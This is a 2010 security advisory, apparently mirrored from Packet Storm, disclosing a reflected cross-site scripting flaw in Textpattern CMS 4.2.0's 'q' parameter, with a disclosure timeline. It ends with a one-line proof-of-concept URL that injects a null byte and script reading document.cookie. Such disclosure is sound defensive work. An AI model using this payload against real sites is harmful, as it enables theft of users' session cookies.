Textpattern 4.2.0 Cross Site Scripting

2010-09-08T00:00:00
ID PACKETSTORM:93605
Type packetstorm
Reporter LiquidWorm
Modified 2010-09-08T00:00:00

Description

                                        
                                            `Textpattern 4.2.0 (txplib_db) Null Termination Cross-Site Scripting Vulnerability  
  
  
Vendor: Team Textpattern  
Product web page: http://www.textpattern.com  
Affected version: 4.2.0  
  
  
Summary: Textpattern is an open source content management system  
unlike any other; it allows you to easily create, edit and publish  
content and make it beautiful in a professional, standards-compliant  
manner.  
  
  
Desc: Textpattern CMS version 4.2.0 suffers from a XSS vulnerability.  
Input passed via the "q" parameter to Textpattern (TXP) Tag Library  
(txplib_db.php) is not properly sanitised before being returned to  
the user. This can be exploited to execute arbitrary HTML and script  
code in a user's browser session in context of an affected site.  
  
  
Tested on: Microsoft Windows XP Professional SP3 (EN)  
PHP 5.3.0  
MySQL 5.1.36  
Apache 2.2.11 (Win32)  
  
  
Vendor status: [05.09.2010] Vulnerability discovered.  
[05.09.2010] Initial contact with the vendor.  
[07.09.2010] No reply from vendor.  
[08.09.2010] Public advisory released.  
  
  
Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic  
Zero Science Lab - http://www.zeroscience.mk  
liquidworm gmail com  
  
  
Zero Science Lab Advisory ID: ZSL-2010-4963  
  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4963.php  
  
  
PoC:  
  
http://127.0.0.1/?q=%00<script>alert(document.cookie)</script>  
`